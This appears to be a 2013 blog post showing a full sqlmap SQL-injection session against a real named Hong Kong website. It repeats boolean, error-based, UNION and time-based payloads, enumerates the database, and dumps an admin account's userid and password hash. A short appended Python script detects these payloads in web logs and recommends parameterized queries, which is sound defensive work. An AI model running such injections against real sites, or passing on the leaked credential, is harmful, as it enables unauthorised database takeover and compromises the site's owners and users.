
sqlmap worked example: MySQL injection

Posted on 2013-4-4 22:18:49
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* Note: get the current user name */
        sqlmap/0.9 - automatic SQL injection and database takeover tool
        http://sqlmap.sourceforge.net
    [*] starting at: 16:53:54
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
    [16:53:54] [INFO] resuming injection data from session file
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    [16:53:54] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=276 AND 799=799
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
        Type: UNION query
        Title: MySQL UNION query (NULL) - 1 to 10 columns
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=276 AND SLEEP(5)
    ---
    [16:53:55] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: Apache 2.2.11, PHP 5.3.0
    back-end DBMS: MySQL 5.0
    [16:53:55] [INFO] fetching current user
    current user:    'root@localhost'
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
    [*] shutting down at: 16:53:58

    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database */
        sqlmap/0.9 - automatic SQL injection and database takeover tool
        http://sqlmap.sourceforge.net
    [*] starting at: 16:54:16
    [16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
    [16:54:16] [INFO] resuming injection data from session file
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    [16:54:16] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=276 AND 799=799
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
        Type: UNION query
        Title: MySQL UNION query (NULL) - 1 to 10 columns
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=276 AND SLEEP(5)
    ---
    [16:54:17] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: Apache 2.2.11, PHP 5.3.0
    back-end DBMS: MySQL 5.0
    [16:54:17] [INFO] fetching current database
    current database:    'wepost'
    [16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
    [*] shutting down at: 16:54:18

    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database */
        sqlmap/0.9 - automatic SQL injection and database takeover tool
        http://sqlmap.sourceforge.net
    [*] starting at: 16:55:25
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
    [16:55:25] [INFO] resuming injection data from session file
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    [16:55:25] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=276 AND 799=799
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
        Type: UNION query
        Title: MySQL UNION query (NULL) - 1 to 10 columns
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=276 AND SLEEP(5)
    ---
    [16:55:26] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: Apache 2.2.11, PHP 5.3.0
    back-end DBMS: MySQL 5.0
    [16:55:26] [INFO] fetching tables for database 'wepost'
    [16:55:27] [INFO] the SQL query used returns 6 entries
    Database: wepost
    [6 tables]
    +-------------+
    | admin       |
    | article     |
    | contributor |
    | idea        |
    | image       |
    | issue       |
    +-------------+
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
    [*] shutting down at: 16:55:33

    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table */
        sqlmap/0.9 - automatic SQL injection and database takeover tool
        http://sqlmap.sourceforge.net
    [*] starting at: 16:56:06
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=276 AND 799=799
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
        Type: UNION query
        Title: MySQL UNION query (NULL) - 1 to 10 columns
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=276 AND SLEEP(5)
    ---
    web server operating system: Windows
    web application technology: Apache 2.2.11, PHP 5.3.0
    back-end DBMS: MySQL 5.0
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
    Database: wepost
    Table: admin
    [4 columns]
    +----------+-------------+
    | Column   | Type        |
    +----------+-------------+
    | id       | int(11)     |
    | password | varchar(32) |
    | type     | varchar(10) |
    | userid   | varchar(20) |
    +----------+-------------+
    [*] shutting down at: 16:56:19

    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of the columns */
        sqlmap/0.9 - automatic SQL injection and database takeover tool
        http://sqlmap.sourceforge.net
    [*] starting at: 16:57:14
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=276 AND 799=799
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
        Type: UNION query
        Title: MySQL UNION query (NULL) - 1 to 10 columns
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=276 AND SLEEP(5)
    ---
    web server operating system: Windows
    web application technology: Apache 2.2.11, PHP 5.3.0
    back-end DBMS: MySQL 5.0
    recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    do you want to use common password suffixes? (slow!) [y/N] y
    Database: wepost
    Table: admin
    [1 entry]
    +----------------------------------+------------+
    | password                         | userid     |
    +----------------------------------+------------+
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
    +----------------------------------+------------+
    [*] shutting down at: 16:58:14
    D:\Python27\sqlmap>
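
The four injection techniques sqlmap reports in the session above each leave a recognisable shape in the web server's access log. The following Python example is added here and is not part of the original post; it flags those shapes in Apache-format log lines. The function names, regular expressions, client address and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import quote, unquote_plus

# One signature per technique named in the sqlmap output above.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?GROUP\s+BY", re.I | re.S),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\s+(?:NULL\s*,\s*)+", re.I),
    "time-based blind": re.compile(r"\b(?:AND|OR)\s+SLEEP\s*\(\s*\d+\s*\)", re.I),
}
# Apache common/combined log line: client, timestamp, request line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+" \d{3}')

def classify(query):
    """Return the techniques whose signature matches the URL-decoded query."""
    decoded = unquote_plus(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan(lines):
    """Return (client, path, techniques) for every request that matches."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line
        client, url = m.groups()
        path, _, query = url.partition("?")
        found = classify(query)
        if found:
            hits.append((client, path, found))
    return hits

# Constructed sample log. Payloads are those printed above (error-based and
# UNION ones abbreviated); client address and timestamp are placeholders.
PAYLOADS = [
    "id=276",
    "id=276 AND 799=799",
    "id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),FLOOR(RAND(0)*2))x "
    "FROM information_schema.tables GROUP BY x)a)",
    "id=-8474 UNION ALL SELECT NULL, NULL, NULL#",
    "id=276 AND SLEEP(5)",
]
LINE = '192.0.2.10 - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?%s HTTP/1.1" 200 512'
SAMPLE_LOG = [LINE % quote(p, safe="=") for p in PAYLOADS]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Signatures like these catch the tool's default payloads in logs after the fact. The durable fix is on the application side: bind `id` as a typed parameter instead of concatenating it into the SQL string.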